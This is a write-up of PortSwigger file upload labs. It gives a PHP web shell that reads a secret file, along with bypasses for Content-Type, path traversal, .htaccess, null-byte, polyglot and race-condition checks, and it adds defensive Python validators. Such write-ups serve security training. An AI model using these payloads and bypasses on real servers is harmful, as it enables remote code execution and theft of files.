PortSwigger lab writeups: file upload vulnerabilities
Remote code execution via web shell upload
Lab
file-upload-remote-code-execution-via-web-shell-upload
Description
This lab contains a vulnerable image upload function. It doesn't perform any validation on the files users upload before storing them on the server's filesystem. To solve the lab, upload a basic PHP web shell and use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner. You can log in to your own account using the following credentials: wiener:peter
Solution
The lab asks for the contents of a file, so create a new file containing this PHP code:
<?php echo file_get_contents('/home/carlos/secret'); ?>
Upload that file at the avatar upload field on the profile page.
Visit the image link /files/avatars/evil.php.
Read the file contents from the response and submit them.
Web shell upload via Content-Type restriction bypass
Lab
file-upload-web-shell-upload-via-content-type-restriction-bypass
Description
This lab contains a vulnerable image upload function. It attempts to prevent users from uploading unexpected file types, but relies on checking user-controllable input to verify this. To solve the lab, upload a basic PHP web shell and use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner. You can log in to your own account using the following credentials: wiener:peter
Solution
On the profile page, at the avatar upload field, try uploading a PHP file containing this code; the response says that only files of type image/png are allowed:
<?php echo file_get_contents('/home/carlos/secret'); ?>
Change the request header of the file part to:
Content-Type: image/png
Visit the uploaded image; the file contents are returned. Submit them to solve the lab.
Web shell upload via path traversal
Lab
file-upload-web-shell-upload-via-path-traversal
Description
This lab contains a vulnerable image upload function. The server is configured to prevent execution of user-supplied files, but this restriction can be bypassed by exploiting a secondary vulnerability. To solve the lab, upload a basic PHP web shell and use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner. You can log in to your own account using the following credentials: wiener:peter
Solution
On the profile page, at the avatar upload field, try uploading a PHP file containing this code:
<?php echo file_get_contents('/home/carlos/secret'); ?>
Visiting the image shows the PHP source printed back verbatim, which means PHP files in that directory are not executed.
Edit the upload POST request: prepend ../ to the filename value in the Content-Disposition header and resubmit.
The server's response is no different from the one without the prefix, which suggests the server strips /. Replace / with its URL-encoded form %2f and resubmit; the server now responds that the file ../<name>.php was uploaded successfully.
Visit the image, read the file contents, and submit them to solve the lab.
Web shell upload via extension blacklist bypass
Lab
file-upload-web-shell-upload-via-extension-blacklist-bypass
Description
This lab contains a vulnerable image upload function. Certain file extensions are blacklisted, but this defense can be bypassed due to a fundamental flaw in the configuration of this blacklist.
To solve the lab, upload a basic PHP web shell, then use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner.
You can log in to your own account using the following credentials: wiener:peter
Solution
On the profile page, at the avatar upload field, try uploading a PHP file containing this code:
<?php echo file_get_contents('/home/carlos/secret'); ?>
The server responds that PHP files are not allowed. Modify the request: change the filename to .htaccess,
change Content-Type to text/plain,
and change the file body to:
AddType application/x-httpd-php .l33t
Submit the request. The Apache server treats this .htaccess file as a configuration file and loads its directives, so files with the .l33t extension are executed as PHP.
Resubmit the PHP file, after first changing its extension from .php to .l33t.
Visit the image, read the file contents, and submit them to solve the lab.
Web shell upload via obfuscated file extension
Lab
file-upload-web-shell-upload-via-obfuscated-file-extension
Description
This lab contains a vulnerable image upload function. Certain file extensions are blacklisted, but this defense can be bypassed using a classic obfuscation technique.
To solve the lab, upload a basic PHP web shell, then use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner.
You can log in to your own account using the following credentials: wiener:peter
Solution
On the profile page, at the avatar upload field, try uploading a PHP file containing this code:
<?php echo file_get_contents('/home/carlos/secret'); ?>
The server responds that only png or jpg files are accepted.
- Add semicolons or URL-encoded null byte characters before the file extension. If validation is written in a high-level language like PHP or Java, but the server processes the file using lower-level functions in C/C++, for example, this can cause discrepancies in what is treated as the end of the filename:
  exploit.asp;.jpg
  or exploit.asp%00.jpg
If the validation code is written in a high-level language such as PHP while the file handling is done in a lower-level language (C/C++), the %00 null byte may be treated as the end of the filename, truncating it there.
Change the filename in the request to .php%00.png and submit; note that the server responds The file avatars/evil.php has been uploaded.
Visit the image, read the file contents, and submit them to solve the lab.
Remote code execution via polyglot web shell upload
Lab
file-upload-remote-code-execution-via-polyglot-web-shell-upload
Description
This lab contains a vulnerable image upload function. Although it checks the contents of the file to verify that it is a genuine image, it is still possible to upload and execute server-side code.
To solve the lab, upload a basic PHP web shell, then use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner.
You can log in to your own account using the following credentials: wiener:peter
Solution
On the profile page, at the avatar upload field, try uploading a PHP file containing this code:
<?php echo file_get_contents('/home/carlos/secret'); ?>
The server responds: only png/jpg files are accepted.
On Windows, concatenate the PNG image and the PHP file in binary mode:
copy /b png.png + php.php pngphp.php
Upload this pngphp.php file; when the server reads it, it identifies the file as a PNG from its binary signature.
Visit the image. Because its extension is .php, the server executes the code; after the image's garbled bytes, a normal alphanumeric string appears, which is the file contents the lab asks for.
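The labs above (Content-Type, path traversal, .htaccess, null-byte and polyglot) each defeat one weak check. As an added defensive example, not part of the original writeup or of the lab's own code, the Python checks below reject every one of those filenames and bodies at once: the client-supplied Content-Type is ignored, the decoded filename must be a plain stem plus one allowlisted extension, and the body's leading bytes must match that extension. The magic-number table and the avatars directory name are assumptions.

```python
import os
import re
from typing import Optional, Tuple
from urllib.parse import unquote

# Constructed allowlist: extension -> leading bytes (magic number) the body must start with
ALLOWED = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
}
AVATAR_DIR = "avatars"  # assumed upload directory, as named in the lab responses

def safe_basename(raw_name: str) -> Optional[str]:
    """Return a sanitized filename, or None if the upload must be rejected."""
    name = unquote(raw_name)                 # decode %2f, %00 etc. BEFORE any check
    if "\x00" in name or ";" in name:        # null-byte / semicolon truncation tricks
        return None
    if "/" in name or "\\" in name or ".." in name:   # path traversal out of avatars/
        return None
    if name.startswith("."):                 # .htaccess and other dotfiles
        return None
    parts = name.split(".")
    if len(parts) != 2 or not re.fullmatch(r"[A-Za-z0-9_-]{1,64}", parts[0]):
        return None                          # exactly one extension and a plain stem
    ext = parts[1].lower()
    if ext not in ALLOWED:                   # allowlist, not a blacklist: .php, .l33t, .asp all fail
        return None
    return f"{parts[0]}.{ext}"

def validate_upload(raw_name: str, body: bytes, client_content_type: str) -> Tuple[bool, str]:
    """Decide whether an upload is accepted and where it would be stored.
    client_content_type is deliberately unused: it is attacker-controlled.
    The body's magic bytes are checked against the extension instead."""
    name = safe_basename(raw_name)
    if name is None:
        return False, "rejected: unsafe filename"
    ext = name.rsplit(".", 1)[1]
    if not body.startswith(ALLOWED[ext]):
        return False, "rejected: body does not match extension"
    return True, os.path.join(AVATAR_DIR, name)
```

A PNG/PHP polyglot renamed to .png still passes these checks; that is harmless only while the server never executes .png files, so re-encoding uploaded images is the extra step a hardened service takes.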
Web shell upload via race condition
Lab
file-upload-web-shell-upload-via-race-condition
Description
This lab contains a vulnerable image upload function. Although it performs robust validation on any files that are uploaded, it is possible to bypass this validation entirely by exploiting a race condition in the way it processes them.
To solve the lab, upload a basic PHP web shell, then use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner.
You can log in to your own account using the following credentials: wiener:peter
Hint
The vulnerable code that introduces this race condition is as follows:
<?php
$target_dir = "avatars/";
$target_file = $target_dir . $_FILES["avatar"]["name"];

// temporary move
move_uploaded_file($_FILES["avatar"]["tmp_name"], $target_file);

if (checkViruses($target_file) && checkFileType($target_file)) {
    echo "The file " . htmlspecialchars($target_file) . " has been uploaded.";
} else {
    unlink($target_file);
    echo "Sorry, there was an error uploading your file.";
    http_response_code(403);
}

function checkViruses($fileName) {
    // checking for viruses
    ...
}

function checkFileType($fileName) {
    $imageFileType = strtolower(pathinfo($fileName, PATHINFO_EXTENSION));
    if ($imageFileType != "jpg" && $imageFileType != "png") {
        echo "Sorry, only JPG & PNG files are allowed\n";
        return false;
    } else {
        return true;
    }
}
?>
Solution
On the profile page, at the avatar upload field, try uploading a PHP file containing this code:
<?php echo file_get_contents('/home/carlos/secret'); ?>
The response says that only png/jpg files are accepted.
Look at the source in the hint: the file is saved to the avatars directory before it is checked, and only deleted if the check fails. If a request to view the avatar arrives during the few tens of milliseconds the PHP checks take, the race condition is triggered.
Sending the requests by hand with Repeater is not fast enough.
Install the Turbo Intruder extension in Burp Suite and write this script:

def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint, concurrentConnections=10)  # number of concurrent connections
    request1 = '''<the request that uploads the PHP file>'''
    request2 = '''<the request that views the avatar>'''
    engine.queue(request1, gate='race1')  # queue the upload request
    for i in range(5):
        engine.queue(request2, gate='race1')  # queue five image-view requests
    engine.openGate('race1')  # release the gate so the queued requests are sent together
    engine.complete(timeout=60)

def handleResponse(req, interesting):
    table.add(req)

Run the attack and check the results: three of the image-view requests return status code 200. Inspecting those three responses gives the secret string; submit it to solve the lab.
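The hint's code moves the upload into the web-reachable avatars/ directory first and validates afterwards, which is exactly the window the Turbo Intruder script races. As an added example, not the lab's code and not part of the original writeup, the Python function below shows the corrected order: validate while the file is still in a private temporary location, and only then rename it into the avatar directory under a server-chosen name in one atomic step, so a rejected file never exists under the web root at any instant. The directory layout and the stand-in virus check are assumptions.

```python
import os
import secrets
import tempfile
from typing import Optional

ALLOWED_EXT = {"jpg", "png"}

def check_file_type(file_name: str) -> bool:
    """Same rule as the lab's checkFileType: the extension must be jpg or png."""
    ext = file_name.rsplit(".", 1)[-1].lower() if "." in file_name else ""
    return ext in ALLOWED_EXT

def check_viruses(path: str) -> bool:
    """Stand-in for the lab's checkViruses (assumption: a real scanner would be called here)."""
    return os.path.getsize(path) > 0

def safe_store(tmp_path: str, original_name: str, avatar_dir: str) -> Optional[str]:
    """Validate the upload while it is still in the private temp location. Only a file
    that passed every check is renamed into avatar_dir, under a server-generated name,
    in a single atomic rename. There is no check-then-delete window in the web root."""
    if not (check_viruses(tmp_path) and check_file_type(original_name)):
        os.unlink(tmp_path)          # still private: nobody could have fetched it
        return None
    ext = original_name.rsplit(".", 1)[-1].lower()
    target = os.path.join(avatar_dir, f"{secrets.token_hex(8)}.{ext}")
    os.replace(tmp_path, target)     # atomic on the same filesystem
    return target

def simulate_upload(original_name: str, content: bytes) -> dict:
    """Constructed harness: a fresh temp tree with a private upload area and an
    'avatars' directory standing in for the web root."""
    root = tempfile.mkdtemp()
    private_dir = os.path.join(root, "tmp_uploads")
    avatar_dir = os.path.join(root, "avatars")
    os.mkdir(private_dir)
    os.mkdir(avatar_dir)
    tmp_path = os.path.join(private_dir, "php" + secrets.token_hex(4))  # like PHP's tmp_name
    with open(tmp_path, "wb") as fh:
        fh.write(content)
    stored = safe_store(tmp_path, original_name, avatar_dir)
    return {"stored": stored, "web_root_files": sorted(os.listdir(avatar_dir))}

if __name__ == "__main__":
    print(simulate_upload("avatar.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16))
    print(simulate_upload("evil.php", b"<?php echo 'constructed sample'; ?>"))
```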